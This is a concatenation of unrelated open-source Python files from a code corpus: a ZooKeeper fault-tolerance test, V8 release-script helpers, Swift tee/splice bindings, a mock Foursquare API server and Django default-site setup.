# Copyright 2015 LinkedIn Corp. # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os from kazoo.client import KazooClient from multiprocessing import Process import time import zopkio.runtime as runtime import zopkio.test_utils as testutilities import zopkio.adhoc_deployer as adhoc_deployer zookeper_deployer = None test_phase = 2 def test_zookeeper_fault_tolerance(): """ Kill zookeeper1 and see if other zookeeper instances are in quorum """ zookeper_deployer = runtime.get_deployer("zookeeper") kazoo_connection_url = str(runtime.get_active_config('zookeeper_host') + ':2181') zkclient = KazooClient(hosts=kazoo_connection_url) zkclient.start() zkclient.ensure_path("/my/zookeeper_errorinjection") # kill the Zookeeper1 instance print "killing zoookeeper instance1" zookeper_deployer.kill("zookeeper1") time.sleep(20) zkclient.stop() def validate_zookeeper_fault_tolerance(): """ Validate that we can still connect to zookeeper instance 2 to read the node """ zk2 = KazooClient(hosts=str(runtime.get_active_config('zookeeper_host') + ':2182')) zk2.start() assert zk2.exists("/my/zookeeper_errorinjection/"), "zookeeper_errorinjection node not found" zk2.stop()
apache-2.0
Champii/runtime
deps/v8/tools/release/common_includes.py
21
29230
#!/usr/bin/env python # Copyright 2013 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import argparse import datetime import httplib import glob import imp import json import os import re import shutil import subprocess import sys import textwrap import time import urllib import urllib2 from git_recipes import GitRecipesMixin from git_recipes import GitFailedException CHANGELOG_FILE = "ChangeLog" DAY_IN_SECONDS = 24 * 60 * 60 PUSH_MSG_GIT_RE = re.compile(r".* \(based on (?P<git_rev>[a-fA-F0-9]+)\)$") PUSH_MSG_NEW_RE = re.compile(r"^Version \d+\.\d+\.\d+$") VERSION_FILE = os.path.join("include", "v8-version.h") VERSION_RE = re.compile(r"^\d+\.\d+\.\d+(?:\.\d+)?$") # V8 base directory. V8_BASE = os.path.dirname( os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) def TextToFile(text, file_name): with open(file_name, "w") as f: f.write(text) def AppendToFile(text, file_name): with open(file_name, "a") as f: f.write(text) def LinesInFile(file_name): with open(file_name) as f: for line in f: yield line def FileToText(file_name): with open(file_name) as f: return f.read() def MSub(rexp, replacement, text): return re.sub(rexp, replacement, text, flags=re.MULTILINE) def Fill80(line): # Replace tabs and remove surrounding space. line = re.sub(r"\t", r" ", line.strip()) # Format with 8 characters indentation and line width 80. return textwrap.fill(line, width=80, initial_indent=" ", subsequent_indent=" ") def MakeComment(text): return MSub(r"^( ?)", "#", text) def StripComments(text): # Use split not splitlines to keep terminal newlines. return "\n".join(filter(lambda x: not x.startswith("#"), text.split("\n"))) def MakeChangeLogBody(commit_messages, auto_format=False): result = "" added_titles = set() for (title, body, author) in commit_messages: # TODO(machenbach): Better check for reverts. A revert should remove the # original CL from the actual log entry. title = title.strip() if auto_format: # Only add commits that set the LOG flag correctly. log_exp = r"^[ \t]*LOG[ \t]*=[ \t]*(?:(?:Y(?:ES)?)|TRUE)" if not re.search(log_exp, body, flags=re.I | re.M): continue # Never include reverts. if title.startswith("Revert "): continue # Don't include duplicates. if title in added_titles: continue # Add and format the commit's title and bug reference. Move dot to the end. added_titles.add(title) raw_title = re.sub(r"(\.|\?|!)$", "", title) bug_reference = MakeChangeLogBugReference(body) space = " " if bug_reference else "" result += "%s\n" % Fill80("%s%s%s." % (raw_title, space, bug_reference)) # Append the commit's author for reference if not in auto-format mode. if not auto_format: result += "%s\n" % Fill80("(%s)" % author.strip()) result += "\n" return result def MakeChangeLogBugReference(body): """Grep for "BUG=xxxx" lines in the commit message and convert them to "(issue xxxx)". """ crbugs = [] v8bugs = [] def AddIssues(text): ref = re.match(r"^BUG[ \t]*=[ \t]*(.+)$", text.strip()) if not ref: return for bug in ref.group(1).split(","): bug = bug.strip() match = re.match(r"^v8:(\d+)$", bug) if match: v8bugs.append(int(match.group(1))) else: match = re.match(r"^(?:chromium:)?(\d+)$", bug) if match: crbugs.append(int(match.group(1))) # Add issues to crbugs and v8bugs. map(AddIssues, body.splitlines()) # Filter duplicates, sort, stringify. crbugs = map(str, sorted(set(crbugs))) v8bugs = map(str, sorted(set(v8bugs))) bug_groups = [] def FormatIssues(prefix, bugs): if len(bugs) > 0: plural = "s" if len(bugs) > 1 else "" bug_groups.append("%sissue%s %s" % (prefix, plural, ", ".join(bugs))) FormatIssues("", v8bugs) FormatIssues("Chromium ", crbugs) if len(bug_groups) > 0: return "(%s)" % ", ".join(bug_groups) else: return "" def SortingKey(version): """Key for sorting version number strings: '3.11' > '3.2.1.1'""" version_keys = map(int, version.split(".")) # Fill up to full version numbers to normalize comparison. while len(version_keys) < 4: # pragma: no cover version_keys.append(0) # Fill digits. return ".".join(map("{0:04d}".format, version_keys)) # Some commands don't like the pipe, e.g. calling vi from within the script or # from subscripts like git cl upload. def Command(cmd, args="", prefix="", pipe=True, cwd=None): cwd = cwd or os.getcwd() # TODO(machenbach): Use timeout. cmd_line = "%s %s %s" % (prefix, cmd, args) print "Command: %s" % cmd_line print "in %s" % cwd sys.stdout.flush() try: if pipe: return subprocess.check_output(cmd_line, shell=True, cwd=cwd) else: return subprocess.check_call(cmd_line, shell=True, cwd=cwd) except subprocess.CalledProcessError: return None finally: sys.stdout.flush() sys.stderr.flush() # Wrapper for side effects. class SideEffectHandler(object): # pragma: no cover def Call(self, fun, *args, **kwargs): return fun(*args, **kwargs) def Command(self, cmd, args="", prefix="", pipe=True, cwd=None): return Command(cmd, args, prefix, pipe, cwd=cwd) def ReadLine(self): return sys.stdin.readline().strip() def ReadURL(self, url, params=None): # pylint: disable=E1121 url_fh = urllib2.urlopen(url, params, 60) try: return url_fh.read() finally: url_fh.close() def ReadClusterFuzzAPI(self, api_key, **params): params["api_key"] = api_key.strip() params = urllib.urlencode(params) headers = {"Content-type": "application/x-www-form-urlencoded"} conn = httplib.HTTPSConnection("backend-dot-cluster-fuzz.appspot.com") conn.request("POST", "/_api/", params, headers) response = conn.getresponse() data = response.read() try: return json.loads(data) except: print data print "ERROR: Could not read response. Is your key valid?" raise def Sleep(self, seconds): time.sleep(seconds) def GetDate(self): return datetime.date.today().strftime("%Y-%m-%d") def GetUTCStamp(self): return time.mktime(datetime.datetime.utcnow().timetuple()) DEFAULT_SIDE_EFFECT_HANDLER = SideEffectHandler() class NoRetryException(Exception): pass class VCInterface(object): def InjectStep(self, step): self.step=step def Pull(self): raise NotImplementedError() def Fetch(self): raise NotImplementedError() def GetTags(self): raise NotImplementedError() def GetBranches(self): raise NotImplementedError() def MasterBranch(self): raise NotImplementedError() def CandidateBranch(self): raise NotImplementedError() def RemoteMasterBranch(self): raise NotImplementedError() def RemoteCandidateBranch(self): raise NotImplementedError() def RemoteBranch(self, name): raise NotImplementedError() def CLLand(self): raise NotImplementedError() def Tag(self, tag, remote, message): """Sets a tag for the current commit. Assumptions: The commit already landed and the commit message is unique. """ raise NotImplementedError() class GitInterface(VCInterface): def Pull(self): self.step.GitPull() def Fetch(self): self.step.Git("fetch") def GetTags(self): return self.step.Git("tag").strip().splitlines() def GetBranches(self): # Get relevant remote branches, e.g. "branch-heads/3.25". branches = filter( lambda s: re.match(r"^branch\-heads/\d+\.\d+$", s), self.step.GitRemotes()) # Remove 'branch-heads/' prefix. return map(lambda s: s[13:], branches) def MasterBranch(self): return "master" def CandidateBranch(self): return "candidates" def RemoteMasterBranch(self): return "origin/master" def RemoteCandidateBranch(self): return "origin/candidates" def RemoteBranch(self, name): # Assume that if someone "fully qualified" the ref, they know what they # want. if name.startswith('refs/'): return name if name in ["candidates", "master"]: return "refs/remotes/origin/%s" % name try: # Check if branch is in heads. if self.step.Git("show-ref refs/remotes/origin/%s" % name).strip(): return "refs/remotes/origin/%s" % name except GitFailedException: pass try: # Check if branch is in branch-heads. if self.step.Git("show-ref refs/remotes/branch-heads/%s" % name).strip(): return "refs/remotes/branch-heads/%s" % name except GitFailedException: pass self.Die("Can't find remote of %s" % name) def Tag(self, tag, remote, message): # Wait for the commit to appear. Assumes unique commit message titles (this # is the case for all automated merge and push commits - also no title is # the prefix of another title). commit = None for wait_interval in [3, 7, 15, 35, 45, 60]: self.step.Git("fetch") commit = self.step.GitLog(n=1, format="%H", grep=message, branch=remote) if commit: break print("The commit has not replicated to git. Waiting for %s seconds." % wait_interval) self.step._side_effect_handler.Sleep(wait_interval) else: self.step.Die("Couldn't determine commit for setting the tag. Maybe the " "git updater is lagging behind?") self.step.Git("tag %s %s" % (tag, commit)) self.step.Git("push origin %s" % tag) def CLLand(self): self.step.GitCLLand() class Step(GitRecipesMixin): def __init__(self, text, number, config, state, options, handler): self._text = text self._number = number self._config = config self._state = state self._options = options self._side_effect_handler = handler self.vc = GitInterface() self.vc.InjectStep(self) # The testing configuration might set a different default cwd. self.default_cwd = (self._config.get("DEFAULT_CWD") or os.path.join(self._options.work_dir, "v8")) assert self._number >= 0 assert self._config is not None assert self._state is not None assert self._side_effect_handler is not None def __getitem__(self, key): # Convenience method to allow direct [] access on step classes for # manipulating the backed state dict. return self._state.get(key) def __setitem__(self, key, value): # Convenience method to allow direct [] access on step classes for # manipulating the backed state dict. self._state[key] = value def Config(self, key): return self._config[key] def Run(self): # Restore state. state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"] if not self._state and os.path.exists(state_file): self._state.update(json.loads(FileToText(state_file))) print ">>> Step %d: %s" % (self._number, self._text) try: return self.RunStep() finally: # Persist state. TextToFile(json.dumps(self._state), state_file) def RunStep(self): # pragma: no cover raise NotImplementedError def Retry(self, cb, retry_on=None, wait_plan=None): """ Retry a function. Params: cb: The function to retry. retry_on: A callback that takes the result of the function and returns True if the function should be retried. A function throwing an exception is always retried. wait_plan: A list of waiting delays between retries in seconds. The maximum number of retries is len(wait_plan). """ retry_on = retry_on or (lambda x: False) wait_plan = list(wait_plan or []) wait_plan.reverse() while True: got_exception = False try: result = cb() except NoRetryException as e: raise e except Exception as e: got_exception = e if got_exception or retry_on(result): if not wait_plan: # pragma: no cover raise Exception("Retried too often. Giving up. Reason: %s" % str(got_exception)) wait_time = wait_plan.pop() print "Waiting for %f seconds." % wait_time self._side_effect_handler.Sleep(wait_time) print "Retrying..." else: return result def ReadLine(self, default=None): # Don't prompt in forced mode. if self._options.force_readline_defaults and default is not None: print "%s (forced)" % default return default else: return self._side_effect_handler.ReadLine() def Command(self, name, args, cwd=None): cmd = lambda: self._side_effect_handler.Command( name, args, "", True, cwd=cwd or self.default_cwd) return self.Retry(cmd, None, [5]) def Git(self, args="", prefix="", pipe=True, retry_on=None, cwd=None): cmd = lambda: self._side_effect_handler.Command( "git", args, prefix, pipe, cwd=cwd or self.default_cwd) result = self.Retry(cmd, retry_on, [5, 30]) if result is None: raise GitFailedException("'git %s' failed." % args) return result def Editor(self, args): if self._options.requires_editor: return self._side_effect_handler.Command( os.environ["EDITOR"], args, pipe=False, cwd=self.default_cwd) def ReadURL(self, url, params=None, retry_on=None, wait_plan=None): wait_plan = wait_plan or [3, 60, 600] cmd = lambda: self._side_effect_handler.ReadURL(url, params) return self.Retry(cmd, retry_on, wait_plan) def GetDate(self): return self._side_effect_handler.GetDate() def Die(self, msg=""): if msg != "": print "Error: %s" % msg print "Exiting" raise Exception(msg) def DieNoManualMode(self, msg=""): if not self._options.manual: # pragma: no cover msg = msg or "Only available in manual mode." self.Die(msg) def Confirm(self, msg): print "%s [Y/n] " % msg, answer = self.ReadLine(default="Y") return answer == "" or answer == "Y" or answer == "y" def DeleteBranch(self, name, cwd=None): for line in self.GitBranch(cwd=cwd).splitlines(): if re.match(r"\*?\s*%s$" % re.escape(name), line): msg = "Branch %s exists, do you want to delete it?" % name if self.Confirm(msg): self.GitDeleteBranch(name, cwd=cwd) print "Branch %s deleted." % name else: msg = "Can't continue. Please delete branch %s and try again." % name self.Die(msg) def InitialEnvironmentChecks(self, cwd): # Cancel if this is not a git checkout. if not os.path.exists(os.path.join(cwd, ".git")): # pragma: no cover self.Die("This is not a git checkout, this script won't work for you.") # Cancel if EDITOR is unset or not executable. if (self._options.requires_editor and (not os.environ.get("EDITOR") or self.Command( "which", os.environ["EDITOR"]) is None)): # pragma: no cover self.Die("Please set your EDITOR environment variable, you'll need it.") def CommonPrepare(self): # Check for a clean workdir. if not self.GitIsWorkdirClean(): # pragma: no cover self.Die("Workspace is not clean. Please commit or undo your changes.") # Checkout master in case the script was left on a work branch. self.GitCheckout('origin/master') # Fetch unfetched revisions. self.vc.Fetch() def PrepareBranch(self): # Delete the branch that will be created later if it exists already. self.DeleteBranch(self._config["BRANCHNAME"]) def CommonCleanup(self): self.GitCheckout('origin/master') self.GitDeleteBranch(self._config["BRANCHNAME"]) # Clean up all temporary files. for f in glob.iglob("%s*" % self._config["PERSISTFILE_BASENAME"]): if os.path.isfile(f): os.remove(f) if os.path.isdir(f): shutil.rmtree(f) def ReadAndPersistVersion(self, prefix=""): def ReadAndPersist(var_name, def_name): match = re.match(r"^#define %s\s+(\d*)" % def_name, line) if match: value = match.group(1) self["%s%s" % (prefix, var_name)] = value for line in LinesInFile(os.path.join(self.default_cwd, VERSION_FILE)): for (var_name, def_name) in [("major", "V8_MAJOR_VERSION"), ("minor", "V8_MINOR_VERSION"), ("build", "V8_BUILD_NUMBER"), ("patch", "V8_PATCH_LEVEL")]: ReadAndPersist(var_name, def_name) def WaitForLGTM(self): print ("Please wait for an LGTM, then type \"LGTM<Return>\" to commit " "your change. (If you need to iterate on the patch or double check " "that it's sane, do so in another shell, but remember to not " "change the headline of the uploaded CL.") answer = "" while answer != "LGTM": print "> ", answer = self.ReadLine(None if self._options.wait_for_lgtm else "LGTM") if answer != "LGTM": print "That was not 'LGTM'." def WaitForResolvingConflicts(self, patch_file): print("Applying the patch \"%s\" failed. Either type \"ABORT<Return>\", " "or resolve the conflicts, stage *all* touched files with " "'git add', and type \"RESOLVED<Return>\"") self.DieNoManualMode() answer = "" while answer != "RESOLVED": if answer == "ABORT": self.Die("Applying the patch failed.") if answer != "": print "That was not 'RESOLVED' or 'ABORT'." print "> ", answer = self.ReadLine() # Takes a file containing the patch to apply as first argument. def ApplyPatch(self, patch_file, revert=False): try: self.GitApplyPatch(patch_file, revert) except GitFailedException: self.WaitForResolvingConflicts(patch_file) def GetVersionTag(self, revision): tag = self.Git("describe --tags %s" % revision).strip() if VERSION_RE.match(tag): return tag else: return None def GetRecentReleases(self, max_age): # Make sure tags are fetched. self.Git("fetch origin +refs/tags/*:refs/tags/*") # Current timestamp. time_now = int(self._side_effect_handler.GetUTCStamp()) # List every tag from a given period. revisions = self.Git("rev-list --max-age=%d --tags" % int(time_now - max_age)).strip() # Filter out revisions who's tag is off by one or more commits. return filter(lambda r: self.GetVersionTag(r), revisions.splitlines()) def GetLatestVersion(self): # Use cached version if available. if self["latest_version"]: return self["latest_version"] # Make sure tags are fetched. self.Git("fetch origin +refs/tags/*:refs/tags/*") version = sorted(filter(VERSION_RE.match, self.vc.GetTags()), key=SortingKey, reverse=True)[0] self["latest_version"] = version return version def GetLatestRelease(self): """The latest release is the git hash of the latest tagged version. This revision should be rolled into chromium. """ latest_version = self.GetLatestVersion() # The latest release. latest_hash = self.GitLog(n=1, format="%H", branch=latest_version) assert latest_hash return latest_hash def GetLatestReleaseBase(self, version=None): """The latest release base is the latest revision that is covered in the last change log file. It doesn't include cherry-picked patches. """ latest_version = version or self.GetLatestVersion() # Strip patch level if it exists. latest_version = ".".join(latest_version.split(".")[:3]) # The latest release base. latest_hash = self.GitLog(n=1, format="%H", branch=latest_version) assert latest_hash title = self.GitLog(n=1, format="%s", git_hash=latest_hash) match = PUSH_MSG_GIT_RE.match(title) if match: # Legacy: In the old process there's one level of indirection. The # version is on the candidates branch and points to the real release # base on master through the commit message. return match.group("git_rev") match = PUSH_MSG_NEW_RE.match(title) if match: # This is a new-style v8 version branched from master. The commit # "latest_hash" is the version-file change. Its parent is the release # base on master. return self.GitLog(n=1, format="%H", git_hash="%s^" % latest_hash) self.Die("Unknown latest release: %s" % latest_hash) def ArrayToVersion(self, prefix): return ".".join([self[prefix + "major"], self[prefix + "minor"], self[prefix + "build"], self[prefix + "patch"]]) def StoreVersion(self, version, prefix): version_parts = version.split(".") if len(version_parts) == 3: version_parts.append("0") major, minor, build, patch = version_parts self[prefix + "major"] = major self[prefix + "minor"] = minor self[prefix + "build"] = build self[prefix + "patch"] = patch def SetVersion(self, version_file, prefix): output = "" for line in FileToText(version_file).splitlines(): if line.startswith("#define V8_MAJOR_VERSION"): line = re.sub("\d+$", self[prefix + "major"], line) elif line.startswith("#define V8_MINOR_VERSION"): line = re.sub("\d+$", self[prefix + "minor"], line) elif line.startswith("#define V8_BUILD_NUMBER"): line = re.sub("\d+$", self[prefix + "build"], line) elif line.startswith("#define V8_PATCH_LEVEL"): line = re.sub("\d+$", self[prefix + "patch"], line) elif (self[prefix + "candidate"] and line.startswith("#define V8_IS_CANDIDATE_VERSION")): line = re.sub("\d+$", self[prefix + "candidate"], line) output += "%s\n" % line TextToFile(output, version_file) class BootstrapStep(Step): MESSAGE = "Bootstapping v8 checkout." def RunStep(self): if os.path.realpath(self.default_cwd) == os.path.realpath(V8_BASE): self.Die("Can't use v8 checkout with calling script as work checkout.") # Directory containing the working v8 checkout. if not os.path.exists(self._options.work_dir): os.makedirs(self._options.work_dir) if not os.path.exists(self.default_cwd): self.Command("fetch", "v8", cwd=self._options.work_dir) class UploadStep(Step): MESSAGE = "Upload for code review." def RunStep(self): if self._options.reviewer: print "Using account %s for review." % self._options.reviewer reviewer = self._options.reviewer else: print "Please enter the email address of a V8 reviewer for your patch: ", self.DieNoManualMode("A reviewer must be specified in forced mode.") reviewer = self.ReadLine() self.GitUpload(reviewer, self._options.author, self._options.force_upload, bypass_hooks=self._options.bypass_upload_hooks, cc=self._options.cc) class DetermineV8Sheriff(Step): MESSAGE = "Determine the V8 sheriff for code review." def RunStep(self): self["sheriff"] = None if not self._options.sheriff: # pragma: no cover return # The sheriff determined by the rotation on the waterfall has a # @google.com account. url = "https://chromium-build.appspot.com/p/chromium/sheriff_v8.js" match = re.match(r"document\.write\('(\w+)'\)", self.ReadURL(url)) # If "channel is sheriff", we can't match an account. if match: g_name = match.group(1) # Optimistically assume that google and chromium account name are the # same. self["sheriff"] = g_name + "@chromium.org" self._options.reviewer = ("%s,%s" % (self["sheriff"], self._options.reviewer)) print "Found active sheriff: %s" % self["sheriff"] else: print "No active sheriff found." def MakeStep(step_class=Step, number=0, state=None, config=None, options=None, side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER): # Allow to pass in empty dictionaries. state = state if state is not None else {} config = config if config is not None else {} try: message = step_class.MESSAGE except AttributeError: message = step_class.__name__ return step_class(message, number=number, config=config, state=state, options=options, handler=side_effect_handler) class ScriptsBase(object): def __init__(self, config=None, side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER, state=None): self._config = config or self._Config() self._side_effect_handler = side_effect_handler self._state = state if state is not None else {} def _Description(self): return None def _PrepareOptions(self, parser): pass def _ProcessOptions(self, options): return True def _Steps(self): # pragma: no cover raise Exception("Not implemented.") def _Config(self): return {} def MakeOptions(self, args=None): parser = argparse.ArgumentParser(description=self._Description()) parser.add_argument("-a", "--author", default="", help="The author email used for rietveld.") parser.add_argument("--dry-run", default=False, action="store_true", help="Perform only read-only actions.") parser.add_argument("-r", "--reviewer", default="", help="The account name to be used for reviews.") parser.add_argument("--sheriff", default=False, action="store_true", help=("Determine current sheriff to review CLs. On " "success, this will overwrite the reviewer " "option.")) parser.add_argument("-s", "--step", help="Specify the step where to start work. Default: 0.", default=0, type=int) parser.add_argument("--work-dir", help=("Location where to bootstrap a working v8 " "checkout.")) self._PrepareOptions(parser) if args is None: # pragma: no cover options = parser.parse_args() else: options = parser.parse_args(args) # Process common options. if options.step < 0: # pragma: no cover print "Bad step number %d" % options.step parser.print_help() return None # Defaults for options, common to all scripts. options.manual = getattr(options, "manual", True) options.force = getattr(options, "force", False) options.bypass_upload_hooks = False # Derived options. options.requires_editor = not options.force options.wait_for_lgtm = not options.force options.force_readline_defaults = not options.manual options.force_upload = not options.manual # Process script specific options. if not self._ProcessOptions(options): parser.print_help() return None if not options.work_dir: options.work_dir = "/tmp/v8-release-scripts-work-dir" return options def RunSteps(self, step_classes, args=None): options = self.MakeOptions(args) if not options: return 1 state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"] if options.step == 0 and os.path.exists(state_file): os.remove(state_file) steps = [] for (number, step_class) in enumerate([BootstrapStep] + step_classes): steps.append(MakeStep(step_class, number, self._state, self._config, options, self._side_effect_handler)) for step in steps[options.step:]: if step.Run(): return 0 return 0 def Run(self, args=None): return self.RunSteps(self._Steps(), args)
apache-2.0
daasbank/swift
swift/common/splice.py
36
5500
# Copyright (c) 2014 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. ''' Bindings to the `tee` and `splice` system calls ''' import os import operator import six import ctypes import ctypes.util __all__ = ['tee', 'splice'] c_loff_t = ctypes.c_long # python 2.6 doesn't have c_ssize_t c_ssize_t = getattr(ctypes, 'c_ssize_t', ctypes.c_long) class Tee(object): '''Binding to `tee`''' __slots__ = '_c_tee', def __init__(self): libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True) try: c_tee = libc.tee except AttributeError: self._c_tee = None return c_tee.argtypes = [ ctypes.c_int, ctypes.c_int, ctypes.c_size_t, ctypes.c_uint ] c_tee.restype = c_ssize_t def errcheck(result, func, arguments): if result == -1: errno = ctypes.set_errno(0) raise IOError(errno, 'tee: %s' % os.strerror(errno)) else: return result c_tee.errcheck = errcheck self._c_tee = c_tee def __call__(self, fd_in, fd_out, len_, flags): '''See `man 2 tee` File-descriptors can be file-like objects with a `fileno` method, or integers. Flags can be an integer value, or a list of flags (exposed on `splice`). This function returns the number of bytes transferred (i.e. the actual result of the call to `tee`). Upon other errors, an `IOError` is raised with the proper `errno` set. ''' if not self.available: raise EnvironmentError('tee not available') if not isinstance(flags, six.integer_types): c_flags = six.moves.reduce(operator.or_, flags, 0) else: c_flags = flags c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)() c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)() return self._c_tee(c_fd_in, c_fd_out, len_, c_flags) @property def available(self): '''Availability of `tee`''' return self._c_tee is not None tee = Tee() del Tee class Splice(object): '''Binding to `splice`''' # From `bits/fcntl-linux.h` SPLICE_F_MOVE = 1 SPLICE_F_NONBLOCK = 2 SPLICE_F_MORE = 4 SPLICE_F_GIFT = 8 __slots__ = '_c_splice', def __init__(self): libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True) try: c_splice = libc.splice except AttributeError: self._c_splice = None return c_loff_t_p = ctypes.POINTER(c_loff_t) c_splice.argtypes = [ ctypes.c_int, c_loff_t_p, ctypes.c_int, c_loff_t_p, ctypes.c_size_t, ctypes.c_uint ] c_splice.restype = c_ssize_t def errcheck(result, func, arguments): if result == -1: errno = ctypes.set_errno(0) raise IOError(errno, 'splice: %s' % os.strerror(errno)) else: off_in = arguments[1] off_out = arguments[3] return ( result, off_in.contents.value if off_in is not None else None, off_out.contents.value if off_out is not None else None) c_splice.errcheck = errcheck self._c_splice = c_splice def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags): '''See `man 2 splice` File-descriptors can be file-like objects with a `fileno` method, or integers. Flags can be an integer value, or a list of flags (exposed on this object). Returns a tuple of the result of the `splice` call, the output value of `off_in` and the output value of `off_out` (or `None` for any of these output values, if applicable). Upon other errors, an `IOError` is raised with the proper `errno` set. Note: if you want to pass `NULL` as value for `off_in` or `off_out` to the system call, you must pass `None`, *not* 0! ''' if not self.available: raise EnvironmentError('splice not available') if not isinstance(flags, six.integer_types): c_flags = six.moves.reduce(operator.or_, flags, 0) else: c_flags = flags c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)() c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)() c_off_in = \ ctypes.pointer(c_loff_t(off_in)) if off_in is not None else None c_off_out = \ ctypes.pointer(c_loff_t(off_out)) if off_out is not None else None return self._c_splice( c_fd_in, c_off_in, c_fd_out, c_off_out, len_, c_flags) @property def available(self): '''Availability of `splice`''' return self._c_splice is not None splice = Splice() del Splice
apache-2.0
omondiy/foursquared.eclair
mock_server/playfoursquare.py
127
1999
#!/usr/bin/python2.6 # # Simple http server to emulate api.playfoursquare.com import logging import shutil import urlparse import SimpleHTTPServer import BaseHTTPServer class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): """Handle playfoursquare.com requests, for testing.""" def do_GET(self): logging.warn('do_GET: %s, %s', self.command, self.path) url = urlparse.urlparse(self.path) logging.warn('do_GET: %s', url) query = urlparse.parse_qs(url.query) query_keys = [pair[0] for pair in query] response = self.handle_url(url) if response != None: self.send_200() shutil.copyfileobj(response, self.wfile) self.wfile.close() do_POST = do_GET def handle_url(self, url): path = None if url.path == '/v1/venue': path = '../captures/api/v1/venue.xml' elif url.path == '/v1/venues': path = '../captures/api/v1/venues.xml' elif url.path == '/v1/user': path = '../captures/api/v1/user.xml' elif url.path == '/v1/checkcity': path = '../captures/api/v1/checkcity.xml' elif url.path == '/v1/checkins': path = '../captures/api/v1/checkins.xml' elif url.path == '/v1/cities': path = '../captures/api/v1/cities.xml' elif url.path == '/v1/switchcity': path = '../captures/api/v1/switchcity.xml' elif url.path == '/v1/tips': path = '../captures/api/v1/tips.xml' elif url.path == '/v1/checkin': path = '../captures/api/v1/checkin.xml' if path is None: self.send_error(404) else: logging.warn('Using: %s' % path) return open(path) def send_200(self): self.send_response(200) self.send_header('Content-type', 'text/xml') self.end_headers() def main(): server_address = ('0.0.0.0', 8080) httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler) sa = httpd.socket.getsockname() print "Serving HTTP on", sa[0], "port", sa[1], "..." httpd.serve_forever() if __name__ == '__main__': main()
apache-2.0
IV-GII/SocialCookies
ENV1/lib/python2.7/site-packages/django/contrib/sites/management.py
232
1587
""" Creates the default Site object. """ from django.db.models import signals from django.db import connections from django.db import router from django.contrib.sites.models import Site from django.contrib.sites import models as site_app from django.core.management.color import no_style def create_default_site(app, created_models, verbosity, db, **kwargs): # Only create the default sites in databases where Django created the table if Site in created_models and router.allow_syncdb(db, Site) : # The default settings set SITE_ID = 1, and some tests in Django's test # suite rely on this value. However, if database sequences are reused # (e.g. in the test suite after flush/syncdb), it isn't guaranteed that # the next id will be 1, so we coerce it. See #15573 and #16353. This # can also crop up outside of tests - see #15346. if verbosity >= 2: print("Creating example.com Site object") Site(pk=1, domain="example.com", name="example.com").save(using=db) # We set an explicit pk instead of relying on auto-incrementation, # so we need to reset the database sequence. See #17415. sequence_sql = connections[db].ops.sequence_reset_sql(no_style(), [Site]) if sequence_sql: if verbosity >= 2: print("Resetting sequence") cursor = connections[db].cursor() for command in sequence_sql: cursor.execute(command) Site.objects.clear_cache() signals.post_syncdb.connect(create_default_site, sender=site_app)
gpl-2.0
jaggu303619/asylum
openerp/addons/hr_holidays/wizard/hr_holidays_summary_employees.py
52
2187
